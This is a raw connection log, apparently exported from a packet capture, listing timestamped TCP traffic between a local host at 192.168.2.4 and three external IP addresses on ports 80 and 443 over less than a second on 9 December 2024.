Dec 9, 2024 08:08:56.326545954 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.326558113 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.326592922 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.327558994 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.327570915 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.327579975 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.327610016 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.327620983 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.329638004 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.329658031 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.329689026 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.329701900 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.330676079 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.330687046 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.330724955 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.331732988 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.331748009 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.331778049 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.331801891 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.332767963 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.332825899 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.333753109 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.333762884 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.333832026 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.334803104 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.334815025 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.334881067 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.335839033 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.335910082 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.336863041 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.336874008 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.336895943 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.336920977 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.336931944 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.337021112 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.337028027 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.337080002 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.337893963 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.337912083 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.337944031 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.337976933 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.338960886 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.338972092 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.339030027 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.341006041 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.341017008 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.341074944 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.342070103 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.342086077 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.342093945 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.342147112 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.343081951 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.343130112 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.344137907 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.344180107 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.345154047 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.345165014 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.345190048 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.345202923 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.346172094 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.346183062 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.346190929 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.346216917 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.346244097 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.348243952 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.348254919 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.348293066 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.349303961 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.349314928 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.349349976 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.350308895 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.350325108 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.350358963 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.350369930 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.351372004 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.351418972 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.352560043 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.352576017 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.352658033 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.352658033 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.353408098 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.353419065 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.353457928 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.354454994 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.354511023 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.355490923 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.355503082 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.355545044 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.356529951 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.356592894 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.357548952 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.357686996 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.358586073 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.358597994 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.358635902 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.359611034 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.359649897 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.359688044 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.359716892 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.360704899 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.360723972 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.360783100 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.360790968 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.360826969 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.360852957 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.364538908 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.364595890 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.366614103 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.366630077 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.366693020 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.366698980 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.366759062 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.378021955 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.378047943 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.378102064 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.378108978 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.378139019 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.378171921 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.386768103 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.386784077 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.386840105 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.386850119 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.386889935 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.399209976 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.399234056 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.399277925 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.399283886 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.399310112 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.399336100 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.438241959 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.438261032 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.438369989 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.438376904 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.438446045 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.513921976 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.513943911 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.513991117 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.514003992 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.514029980 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.514053106 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.523339987 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.523360014 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.523391962 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.523400068 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.523422956 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.523443937 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.525239944 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:56.531394005 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.531409979 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.531465054 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.531471968 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.531507969 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.540452003 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.540484905 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.540519953 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.540528059 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.540549040 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.540574074 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.548968077 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.548986912 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.549045086 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.549056053 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.549094915 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.557466030 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.557487965 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.557534933 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.557543039 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.557553053 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.559465885 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.564023018 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.564038992 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.564095974 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.564101934 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.564145088 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.644442081 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:56.696254969 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.700495958 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.700516939 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.700560093 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.700567961 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.700596094 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.700614929 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.706541061 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.706559896 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.706617117 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.706624031 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.706640959 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.706674099 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.713074923 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.713093996 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.713145018 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.713151932 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.713162899 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.713193893 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.719135046 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.719151020 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.719203949 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.719213963 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.719253063 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.725630999 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.725646973 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.725703001 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.725708961 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.725749016 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.731102943 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.731740952 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.731756926 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.731790066 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.731796026 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.731823921 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.731844902 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.737723112 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.737739086 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.737778902 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.737785101 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.737813950 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.737832069 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.744245052 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.744260073 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.744316101 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.744322062 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:56.744359970 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:56.815587044 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.815849066 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.815862894 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.815890074 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.850411892 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.850462914 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.850807905 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.850820065 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.850861073 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.851705074 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.852262020 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.852273941 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.852298975 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.853102922 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.853121996 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.853162050 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.854120016 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.854183912 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.854530096 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.854541063 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.854584932 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.855562925 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.855573893 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.855607033 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.856643915 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.856657028 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.856693029 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.857651949 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.857664108 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.857726097 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.858671904 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.858685017 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.858695984 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.858731985 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.859711885 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.859724045 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.859757900 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.860734940 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.860755920 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.860805988 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.861749887 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.861762047 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.861803055 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.862816095 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.862848997 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.862849951 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.863817930 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.863831043 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.863878012 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.864864111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.864876986 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.864886999 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.864921093 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.864933014 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.865915060 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.865926981 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.865956068 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.866936922 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.866949081 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.866986990 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.867969990 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.867980003 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.867989063 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.868030071 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.868999958 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.869012117 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.869055033 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.870031118 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.870044947 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.870078087 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.871094942 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.871108055 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.871148109 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.872078896 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.872101068 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.872107029 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.872134924 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.872160912 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.873150110 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.873167992 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.873213053 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.874140978 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.874160051 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.874201059 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.875184059 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.875205040 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.875252962 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.876188993 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.876219034 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.876231909 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.876267910 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.877299070 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.877310991 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.877337933 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.878298998 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.878312111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.878336906 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.879369020 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.879380941 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.879430056 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.880426884 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.880439997 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.880481005 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.881377935 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.881397009 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.881407022 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.881441116 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.881453037 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.882440090 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.882452011 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.882492065 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.883498907 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.883511066 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.883553028 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.884525061 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.884537935 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:56.884582043 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:56.885880947 CET	80	49886	185.215.113.16	192.168.2.4
